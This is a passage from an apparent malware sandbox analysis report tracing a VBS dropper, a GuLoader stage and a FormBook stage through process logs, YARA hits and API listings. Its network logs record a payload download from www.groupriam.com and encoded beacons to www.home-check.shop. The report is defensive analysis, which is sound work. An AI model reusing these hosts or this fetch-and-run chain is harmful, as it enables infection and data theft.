                                                Aug 27, 2024 08:05:18.337784052 CEST | 292 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:18 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                89 | 192.168.11.20 | 49931 | 185.230.15.3 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:05:20.341361046 CEST | 555 | OUT | GET /ns8q/?ij60MtY=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s=&tvodg=2Zld-RLxEfN HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:05:20.632642031 CEST | 254 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:20 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Raw: 34 36 0d 0a 3c 68 31 3e 52 65 6c 61 74 65 64 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 53 6f 72 72 79 2c 20 77 65 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 61 74 20 70 61 67 65 2e 3c 2f 70 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 46<h1>Related Page not found</h1><p>Sorry, we cannot find that page.</p>0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.11.20 | 49840 | 199.103.62.205 | 443 | 6800 | C:\Users\user\AppData\Local\Temp\x.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-27 05:57:27 UTC | 176 | OUT | GET /EiopsiA213.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: www.groupriam.com
                                                Cache-Control: no-cache
                                                2024-08-27 05:57:27 UTC | 422 | IN | HTTP/1.1 200 OK
                                                Connection: close
                                                content-type: application/octet-stream
                                                last-modified: Mon, 26 Aug 2024 22:29:31 GMT
                                                accept-ranges: bytes
                                                content-length: 336448
                                                date: Tue, 27 Aug 2024 05:57:27 GMT
                                                server: LiteSpeed
                                                vary: User-Agent
                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"



                                                Target ID:0
                                                Start time:01:56:26
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs"
                                                Imagebase:0x7ff6712a0000
                                                File size:170'496 bytes
                                                MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:01:56:33
                                                Start date:27/08/2024
                                                Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                Imagebase:0x400000
                                                File size:757'008 bytes
                                                MD5 hash:36EFC401E52E98CD1C735D8A767A1E6D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.136009104486.00000000038BE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                Reputation:low
                                                Has exited:true

                                                Target ID:3
                                                Start time:01:57:22
                                                Start date:27/08/2024
                                                Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                Imagebase:0x400000
                                                File size:757'008 bytes
                                                MD5 hash:36EFC401E52E98CD1C735D8A767A1E6D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.136238638056.00000000341C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.136239540037.0000000035220000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.136219856391.000000000258E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:4
                                                Start time:01:57:41
                                                Start date:27/08/2024
                                                Path:C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe"
                                                Imagebase:0x550000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.140484881545.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                Reputation:high
                                                Has exited:false

                                                Target ID:5
                                                Start time:01:57:42
                                                Start date:27/08/2024
                                                Path:C:\Windows\SysWOW64\cmdkey.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                                                Imagebase:0xad0000
                                                File size:17'408 bytes
                                                MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.140485141531.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.140482656730.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.140485253633.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:6
                                                Start time:01:57:55
                                                Start date:27/08/2024
                                                Path:C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe"
                                                Imagebase:0x550000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.140483811557.00000000014B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                Reputation:high
                                                Has exited:false

                                                Target ID:7
                                                Start time:01:58:09
                                                Start date:27/08/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff7a7970000
                                                File size:597'432 bytes
                                                MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                  Execution Graph

                                                  Execution Coverage:24.5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:15.6%
                                                  Total number of Nodes:806
                                                  Total number of Limit Nodes:29

                                                  Control-flow Graph

                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004034EA
                                                  • GetVersionExA.KERNEL32 ref: 00403513
                                                  • GetVersionExA.KERNEL32(?), ref: 00403526
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035FE
                                                  • #17.COMCTL32(00000008,0000000A,0000000C), ref: 00403638
                                                  • OleInitialize.OLE32(00000000), ref: 0040363F
                                                  • SHGetFileInfoA.SHELL32(0040844B,00000000,?,00000160,00000000), ref: 0040365E
                                                  • GetCommandLineA.KERNEL32(Yangtze Setup,NSIS Error), ref: 00403673
                                                  • CharNextA.USER32(00000000,"C:\Users\user\AppData\Local\Temp\x.exe" ,00000000,"C:\Users\user\AppData\Local\Temp\x.exe" ,00000000), ref: 004036B2
                                                  • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403770
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403785
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403795
                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037AD
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004037BA
                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004037CB
                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004037D7
                                                  • DeleteFileA.KERNELBASE(1033), ref: 004037EB
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\x.exe" ,00000000,00000000), ref: 0040387C
                                                    • Part of subcall function 004067CB: lstrcpynA.KERNEL32(?,?,00000400,00403673,Yangtze Setup,NSIS Error), ref: 004067D8
                                                  • wsprintfA.USER32 ref: 004038BF
                                                  • GetFileAttributesA.KERNEL32(007A4400,C:\Users\user\AppData\Local\Temp\), ref: 004038FE
                                                  • DeleteFileA.KERNEL32(007A4400), ref: 00403914
                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403947
                                                  • CopyFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\x.exe,007A4400,00000001), ref: 00403965
                                                  • OleUninitialize.OLE32(00000000), ref: 004039BC
                                                  • ExitProcess.KERNEL32 ref: 004039D3
                                                  • CloseHandle.KERNEL32(00000000,007A4800,007A4800,?,007A4400,00000000), ref: 004039EA
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A0A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403A11
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A27
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A4C
                                                    • Part of subcall function 004065A6: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403612,0000000C), ref: 004065B4
                                                    • Part of subcall function 004065A6: GetProcAddress.KERNEL32(00000000), ref: 004065D0
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403A73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CurrentDeleteDirectoryEnvironmentExitHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AddressAdjustAttributesCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValuelstrcpynwsprintf
                                                  • String ID: $ /D=$ _?=$"C:\Users\user\AppData\Local\Temp\x.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\x.exe$C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233$C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Heteromastigote$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NCRC$NSIS Error$S$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Yangtze Setup$\Temp$~nsu%X.tmp
                                                  APIs
                                                    • Part of subcall function 73AD12C6: GlobalAlloc.KERNEL32(00000040,73AD11C4,-000000A0), ref: 73AD12CE
                                                  • lstrcpyA.KERNEL32(?,?), ref: 73AD27C0
                                                  • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73AD281B
                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 73AD286B
                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 73AD2876
                                                  • GlobalFree.KERNEL32(00000000), ref: 73AD2887
                                                  • GlobalFree.KERNEL32(?), ref: 73AD2901
                                                  • GlobalFree.KERNEL32(?), ref: 73AD2907
                                                  • GlobalFree.KERNEL32(?), ref: 73AD290D
                                                  • GetModuleHandleA.KERNEL32(00000008), ref: 73AD29D7
                                                  • LoadLibraryA.KERNEL32(00000008), ref: 73AD29E8
                                                  • GetProcAddress.KERNEL32(?,?), ref: 73AD2A3C
                                                  • lstrlenA.KERNEL32(00000408), ref: 73AD2A57
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136024471445.0000000073AD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73AD0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_73ad0000_x.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                  • String ID: :

                                                  APIs
                                                    • Part of subcall function 004062E2: lstrlenA.KERNEL32(007A0288,00000000,007A0288,007A0288,00000000,?,?,004063E0,?,00000000,76763410,?), ref: 00406331
                                                    • Part of subcall function 004062E2: GetFileAttributesA.KERNELBASE(007A0288,007A0288), ref: 00406342
                                                  • DeleteFileA.KERNELBASE(?,?,00000000,76763410,?), ref: 004063EA
                                                  • lstrcatA.KERNEL32(0079FE88,\*.*,0079FE88,?,00000000,?,00000000,76763410,?), ref: 0040643C
                                                  • lstrcatA.KERNEL32(?,00408298,?,0079FE88,?,00000000,?,00000000,76763410,?), ref: 0040645A
                                                  • lstrlenA.KERNEL32(?), ref: 0040645D
                                                  • FindFirstFileA.KERNELBASE(0079FE88,?), ref: 00406474
                                                  • FindNextFileA.KERNEL32(?,00000010,000000F2,?,?,?), ref: 00406529
                                                  • FindClose.KERNEL32(?), ref: 0040653B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                                  • String ID: \*.*
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(00000000,007A1288,00000000,00406321,007A0288), ref: 00406289
                                                  • FindClose.KERNEL32(00000000), ref: 00406295
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:

                                                  APIs
                                                    • Part of subcall function 004065A6: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403612,0000000C), ref: 004065B4
                                                    • Part of subcall function 004065A6: GetProcAddress.KERNEL32(00000000), ref: 004065D0
                                                  • lstrcatA.KERNEL32(1033,0079DE10,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079DE10,00000000,00000002,00000000,76763410,00000000,00000000), ref: 004057FA
                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233,1033,0079DE10,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079DE10,00000000,00000002,00000000), ref: 00405871
                                                  • lstrcmpiA.KERNEL32(-000000FC,.exe), ref: 00405885
                                                  • GetFileAttributesA.KERNEL32(Call), ref: 00405890
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233), ref: 004058D9
                                                    • Part of subcall function 004062C9: wsprintfA.USER32 ref: 004062D6
                                                  • RegisterClassA.USER32(007A1FE0), ref: 0040591E
                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00405935
                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040596A
                                                  • ShowWindow.USER32(00000005,00000000), ref: 0040599C
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,007A1FE0), ref: 004059C7
                                                  • GetClassInfoA.USER32(00000000,RichEdit,007A1FE0), ref: 004059D4
                                                  • RegisterClassA.USER32(007A1FE0), ref: 004059E1
                                                  • DialogBoxParamA.USER32(?,00000000,00404D44,00000000), ref: 004059FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb

                                                  Control-flow Graph (not reproduced; legend: Executed / Not Executed; first block 40154a-4015a6)
                                                  APIs
                                                  • PostQuitMessage.USER32(?), ref: 004015D6
                                                  • Sleep.KERNELBASE(00000001,?,?,?,?), ref: 0040160D
                                                  • SetForegroundWindow.USER32 ref: 00401619
                                                  • ShowWindow.USER32(00000000), ref: 004016B7
                                                  • ShowWindow.USER32(00000000,?), ref: 004016CC
                                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004016DF
                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401749
                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Heteromastigote,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dll,00000000,000000F0), ref: 00401780
                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 004017CB
                                                  • GetFullPathNameA.KERNEL32(00000000,00000400,00000000,?,?,000000E3,C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dll), ref: 00401821
                                                  • GetShortPathNameA.KERNEL32(00000000,00000000,00000400), ref: 0040186A
                                                  • SearchPathA.KERNELBASE(?,00000000,?,00000400,00000400,?,000000FF), ref: 0040188A
                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Heteromastigote,00000000,00000000,00000031,00000400,00000000,000000EF), ref: 004018F4
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Heteromastigote,00000000,00000000,00000031,00000400,00000000,000000EF), ref: 0040191C
                                                  • SetFileTime.KERNELBASE(?,?,?,?,?,?,?,?,000000EA,?,Call,40000000,00000001,Call,00000000,00000000), ref: 00401A28
                                                  • CloseHandle.KERNELBASE(?), ref: 00401A2F
                                                  • lstrcatA.KERNEL32(Call,?,Call,000000E9), ref: 00401A50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp$C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dll$C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Heteromastigote$Call

                                                  Control-flow Graph (not reproduced; legend: Executed / Not Executed; first block 4031c2-40320f)
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004031D5
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\x.exe,00000400,?,?,?,?,?), ref: 004031F1
                                                    • Part of subcall function 004065DB: GetFileAttributesA.KERNELBASE(00000003,00403204,C:\Users\user\AppData\Local\Temp\x.exe,80000000,00000003,?,?,?,?,?), ref: 004065DF
                                                    • Part of subcall function 004065DB: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 004065FF
                                                  • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\x.exe,C:\Users\user\AppData\Local\Temp\x.exe,80000000,00000003,?,?,?,?,?), ref: 0040323B
                                                  • GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 00403395
                                                  Strings
                                                  • Null, xrefs: 004032C3
                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004031C8
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 0040321C, 00403221, 00403227
                                                  • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error, xrefs: 00403415
                                                  • soft, xrefs: 004032B9
                                                  • C:\Users\user\AppData\Local\Temp\x.exe, xrefs: 004031E0, 004031EA, 004031FE, 0040321B
                                                  • Error launching installer, xrefs: 00403211
                                                  • Inst, xrefs: 004032AF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\x.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error$Null$soft

                                                  Control-flow Graph (not reproduced; legend: Executed / Not Executed; first block 405c08-405c11)
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405D3D
                                                    • Part of subcall function 004067CB: lstrcpynA.KERNEL32(?,?,00000400,00403673,Yangtze Setup,NSIS Error), ref: 004067D8
                                                    • Part of subcall function 004069AE: CharNextA.USER32(?,*?|<>/":,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A15
                                                    • Part of subcall function 004069AE: CharNextA.USER32(?,?,?,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A22
                                                    • Part of subcall function 004069AE: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A27
                                                    • Part of subcall function 004069AE: CharPrevA.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,00000000,?,00403AA4,C:\Users\user\AppData\Local\Temp\,76763410,00403777), ref: 00406A3E
                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400,00000000,0079F640,00000006,00000000,?,00405A98,0079F640,?,?,?,?), ref: 00405D53
                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,00405A98,0079F640,?,?,?,?), ref: 00405DE3
                                                  • lstrlenA.KERNEL32(Call,00000000,0079F640,00000006,00000000,?,00405A98,0079F640,?,?,?,?), ref: 00405E3D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch

                                                  Control-flow Graph (not reproduced; legend: Executed / Not Executed; first block 402f57-402f84)
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402FB9
                                                  • GetTickCount.KERNEL32 ref: 0040304B
                                                  • MulDiv.KERNEL32(?,00000064,?), ref: 0040307B
                                                  • wsprintfA.USER32 ref: 0040308C
                                                    • Part of subcall function 00402F40: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004033AC,00048BE4,?,?,?,?,?), ref: 00402F4E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CountTick$FilePointerwsprintf
                                                  • String ID: ... %d%%$a;y

                                                  Control-flow Graph

                                                  control_flow_graph 893 405f0b-405f2b GetSystemDirectoryA 894 405f45 893->894 895 405f2d-405f2f 893->895 897 405f4b 894->897 895->894 896 405f31-405f3c 895->896 896->897 898 405f3e-405f43 896->898 899 405f50-405f75 wsprintfA LoadLibraryExA 897->899 898->899
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F22
                                                  • wsprintfA.USER32 ref: 00405F5A
                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F6E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.136006294304.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME
                                                  • API String ID: 2200240437-4069249669

                                                  Control-flow Graph

                                                  control_flow_graph 900 406712-40671c 901 40671d-406747 GetTickCount GetTempFileNameA 900->901 902 406751 901->902 903 406749-40674b 901->903 905 406753-406756 902->905 903->901 904 40674d-40674f 903->904 904->905
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00406725
